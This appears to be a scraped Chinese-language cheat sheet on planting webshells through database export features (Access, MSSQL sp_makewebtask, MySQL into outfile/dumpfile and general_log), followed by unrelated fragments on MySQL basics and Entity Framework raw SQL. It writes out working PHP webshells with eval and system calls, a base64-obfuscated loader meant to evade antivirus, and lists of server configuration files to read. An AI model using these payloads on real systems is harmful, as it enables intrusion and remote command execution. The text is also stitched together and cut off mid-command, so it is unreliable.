access可匯出***等檔案需要配合解析漏洞
create table cmd (a varchar(50));
insert into cmd (a) values ('一句話木馬') #一句話木馬如:
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd
drop table cmd
exec sp_makewebtask 'c:\test1.php','select "" '--方式一
create table xiaoma (xiaoma1 text not null);
insert into xiaoma (xiaoma1) values('<?php eval($_post[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'd:/phpstudy/www/7.php';
drop table if exists xiaoma;
select "<?php eval($_post[v01cano]);?>" into outfile 'd:/phpstudy/www/a.php'當資料庫路徑未知時getshell
//建立表a,並且將httpd.conf寫入到表a中
c:\windows\php.ini # php配置檔案
c:\windows\system32\inetsrv\metabase.xml # iis虛擬主機配置檔案
# linux
/etc/php.ini # php配置檔案
/etc/httpd/conf/httpd.conf # apache配置檔案
/usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置檔案
/user/local/nginx/conf/httpd.conf # nginx配置檔案
方式五general_log_file方法獲取webshell
show global variables like 'secure%'show global variables like "%genera%"; #檢視genera檔案配置情況
set global general_log = off; #關閉general_log
set global general_log = 'on'; #如果general_log關閉需要開啟
set global general_log_file = 'd:/www/web/shell.php'
可執行命令方式
select '<?php echo \'\'; system($_get[\'cmd\']); echo \'www.***.com/shell.php?cmd=ipconfig #cmd=後面加命令過防毒軟體方式,先導出含有base64加密的馬,再到處檔案包含的php。
<?php $a = 'pd9wahagq**2ywwojf9qt1nuwydjj10po2rtdsgpoz8+'; error_reporting(0); @set_time_limit(0); eval("?>".base64_decode($a));?>select '<?php include 'c.jpg'?>' into outfile 'd:/work/www/shell.php'直接匯出加密webshell
select unhex('加密**') into dumpfile 'd:/www/web/shell.php'資料庫命令
mysql常用命令 show databases use manage create table user name varchar 20 password varchar 20 age int describe user insert into user values admin admin 10...
直接執行資料庫命令
使用 ef 4.1 或者更新版本,你可以直接執行任何資料庫命令.在本節介紹的方法允許你對資料庫執行原生的 sql 命令.通過 sql 查詢語句獲取實體物件集 dbset 類中的 sqlquery 方法允許你執行乙個返回實體物件集的原生 sql 查詢.預設情況下,返回的物件集會被上下文跟蹤 這可以通過...
Mysql資料庫命令
create database mydata use mydata create table dept deptno int primary key,dname varchar 14 loc varchar 13 create table emp empno int primary key,enam...